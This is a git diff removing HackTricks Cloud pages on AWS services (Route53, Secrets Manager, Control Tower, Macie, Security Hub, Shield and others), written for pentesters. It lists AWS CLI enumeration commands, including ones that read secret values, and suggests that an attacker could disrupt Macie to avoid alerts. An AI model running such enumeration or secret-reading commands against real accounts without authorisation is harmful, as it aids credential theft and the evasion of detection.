-{% endhint %} - -## Directconnect - -Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). - -``` -aws directconnect describe-connections -aws directconnect describe-interconnects -aws directconnect describe-virtual-gateways -aws directconnect describe-virtual-interfaces -``` - -## Support - -In AWS you can access current and previous support cases via the API - -``` -aws support describe-cases --include-resolved-cases -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md deleted file mode 100644 index 96cc1cdee..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - Route53 Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Route 53 - -Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ -You can create https, http and tcp **health checks for web pages** via Route53. - -### IP-based routing - -This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ -IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. - -### Enumeration - -```bash -aws route53 list-hosted-zones # Get domains -aws route53 get-hosted-zone --id -aws route53 list-resource-record-sets --hosted-zone-id # Get all records -aws route53 list-health-checks -aws route53 list-traffic-policies -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md" %} -[route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md](../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md deleted file mode 100644 index 95d71ffd1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ /dev/null @@ -1,76 +0,0 @@ -# AWS - Secrets Manager Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Secrets Manager - -AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. - -The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. - -The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. - -For granting access to secrets to a user from a different AWS account, it's necessary to: - -1. Authorize the user to access the secret. -2. Grant permission to the user to decrypt the secret using KMS. -3. Modify the Key policy to allow the external user to utilize it. - -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** - -### **Enumeration** - -```bash -aws secretsmanager list-secrets #Get metadata of all secrets -aws secretsmanager list-secret-version-ids --secret-id # Get versions -aws secretsmanager describe-secret --secret-id # Get metadata -aws secretsmanager get-secret-value --secret-id # Get value -aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version -aws secretsmanager get-resource-policy --secret-id --secret-id -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} -[aws-secrets-manager-privesc.md](../aws-privilege-escalation/aws-secrets-manager-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-secrets-manager-post-exploitation.md" %} -[aws-secrets-manager-post-exploitation.md](../aws-post-exploitation/aws-secrets-manager-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-secrets-manager-persistence.md" %} -[aws-secrets-manager-persistence.md](../aws-persistence/aws-secrets-manager-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md deleted file mode 100644 index 203439dda..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md +++ /dev/null @@ -1,72 +0,0 @@ -# AWS - Control Tower Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Control Tower - -{% hint style="info" %} -In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from COntrol Tower that will be applied on them. -{% endhint %} - -AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. - -AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. - -With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. - -In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. - -Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. - -### Enumeration - -For enumerating controltower controls, you first need to **have enumerated the org**: - -{% content-ref url="../aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-organizations-enum.md) -{% endcontent-ref %} - -{% code overflow="wrap" %} -```bash -# Get controls applied in an account -aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ -``` -{% endcode %} - -{% hint style="warning" %} -Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts -{% endhint %} - -### Post Exploitation & Persistence - -{% content-ref url="../../aws-post-exploitation/aws-control-tower-post-exploitation.md" %} -[aws-control-tower-post-exploitation.md](../../aws-post-exploitation/aws-control-tower-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md deleted file mode 100644 index 588e24ab1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Cost Explorer Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cost Explorer and Anomaly detection - -This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. - -### Budgets - -Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md deleted file mode 100644 index 35ff808ba..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ /dev/null @@ -1,42 +0,0 @@ -# AWS - Detective Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Detective - -**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. - -The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. - -## References - -* [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/) -* [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md deleted file mode 100644 index 6667dcf6b..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ /dev/null @@ -1,145 +0,0 @@ -# AWS - Macie Enum - -## AWS - Macie Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Macie - -Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. - -Key Features of Amazon Macie: - -1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. -2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. -3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. -4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. -5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. - -Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. - -### Alert System - -Macie categorizes alerts into predefined categories like: - -* Anonymized access -* Data compliance -* Credential Loss -* Privilege escalation -* Ransomware -* Suspicious access, etc. - -These alerts provide detailed descriptions and result breakdowns for effective response and resolution. - -### Dashboard Features - -The dashboard categorizes data into various sections, including: - -* S3 Objects (by time range, ACL, PII) -* High-risk CloudTrail events/users -* Activity Locations -* CloudTrail user identity types, and more. - -### User Categorization - -Users are classified into tiers based on the risk level of their API calls: - -* **Platinum**: High-risk API calls, often with admin privileges. -* **Gold**: Infrastructure-related API calls. -* **Silver**: Medium-risk API calls. -* **Bronze**: Low-risk API calls. - -### Identity Types - -Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. - -### Data Classification - -Data classification encompasses: - -* Content-Type: Based on detected content type. -* File Extension: Based on file extension. -* Theme: Categorized by keywords within files. -* Regex: Categorized based on specific regex patterns. - -The highest risk among these categories determines the file's final risk level. - -### Research and Analysis - -Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. - -### Enumeration - -``` -# Get buckets -aws macie2 describe-buckets - -# Org config -aws macie2 describe-organization-configuration - -# Get admin account (if any) -aws macie2 get-administrator-account -aws macie2 list-organization-admin-accounts # Run from the management account of the org - -# Get macie account members (run this form the admin account) -aws macie2 list-members - -# Check if automated sensitive data discovey is enabled -aws macie2 get-automated-discovery-configuration - -# Get findings -aws macie2 list-findings -aws macie2 get-findings --finding-ids -aws macie2 list-findings-filters -aws macie2 get -findings-filters --id - -# Get allow lists -aws macie2 list-allow-lists -aws macie2 get-allow-list --id - -# Get different info -aws macie2 list-classification-jobs -aws macie2 list-classification-scopes -aws macie2 list-custom-data-identifiers -``` - -#### Post Exploitation - -{% hint style="success" %} -From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ -However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. -{% endhint %} - -TODO: PRs are welcome! - -## References - -* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md deleted file mode 100644 index ec054c188..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md +++ /dev/null @@ -1,89 +0,0 @@ -# AWS - Security Hub Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Security Hub - -**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. - -It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts - -**Characteristics** - -* Regional (findings don't cross regions) -* Multi-account support -* Findings from: - * Guard Duty - * Config - * Inspector - * Macie - * third party - * self-generated against CIS standards - -## Enumeration - -``` -# Get basic info -aws securityhub describe-hub - -# Get securityhub org config -aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error - -# Get the configured admin for securityhub -aws securityhub get-administrator-account -aws securityhub get-master-account # Another way -aws securityhub list-organization-admin-accounts # Another way - -# Get enabled standards -aws securityhub get-enabled-standards - -# Get the findings -aws securityhub get-findings - -# Get insights -aws securityhub get-insights - -# Get Automation rules (must be from the admin account) -aws securityhub list-automation-rules - -# Get members (must be from the admin account) -aws securityhub list-members -aws securityhub get-members --account-ids -``` - -## Bypass Detection - -TODO, PRs accepted - -## References - -* [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) -* [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md deleted file mode 100644 index b6ee0fa3a..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Shield Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Shield - -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. - -**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. - -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. - -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md deleted file mode 100644 index 518251fd6..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ /dev/null @@ -1,97 +0,0 @@ -# AWS - Trusted Advisor Enum - -## AWS - Trusted Advisor Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Trusted Advisor Overview - -Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: - -1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. -2. **Performance:** Identifies potential performance bottlenecks. -3. **Security:** Scans for vulnerabilities or weak security configurations. -4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. - -The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. - -### Notifications and Data Refresh - -* Trusted Advisor can issue alerts. -* Items can be excluded from its checks. -* Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. - -### **Checks Breakdown** - -#### CategoriesCore - -1. Cost Optimization -2. Security -3. Fault Tolerance -4. Performance -5. Service Limits -6. S3 Bucket Permissions - -#### Core Checks - -Limited to users without business or enterprise support plans: - -1. Security Groups - Specific Ports Unrestricted -2. IAM Use -3. MFA on Root Account -4. EBS Public Snapshots -5. RDS Public Snapshots -6. Service Limits - -#### Security Checks - -A list of checks primarily focusing on identifying and rectifying security threats: - -* Security group settings for high-risk ports -* Security group unrestricted access -* Open write/list access to S3 buckets -* MFA enabled on root account -* RDS security group permissiveness -* CloudTrail usage -* SPF records for Route 53 MX records -* HTTPS configuration on ELBs -* Security groups for 